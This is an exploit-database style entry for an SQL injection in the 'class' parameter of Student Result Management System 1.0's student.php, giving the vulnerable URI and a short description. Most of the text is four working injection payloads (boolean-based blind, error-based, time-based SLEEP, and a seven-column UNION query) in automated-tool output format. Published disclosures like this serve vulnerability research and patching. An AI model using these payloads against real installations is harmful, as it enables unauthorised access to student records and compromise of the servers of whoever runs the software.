# Exploit Title: Student Result Management System 1.0 - 'class' SQL Injection
# Date: 09.09.2020
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage : https://projectworlds.in
# Software Page: https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server.

The vulnerable parameter uri: /srms/student.php?class=<injection point>

exploit:

    Parameter: class (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: class=-6346' OR 3657=3657#&rn=1

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1

    Type: UNION query
    Title: MySQL UNION query (random number) - 7 columns
    Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1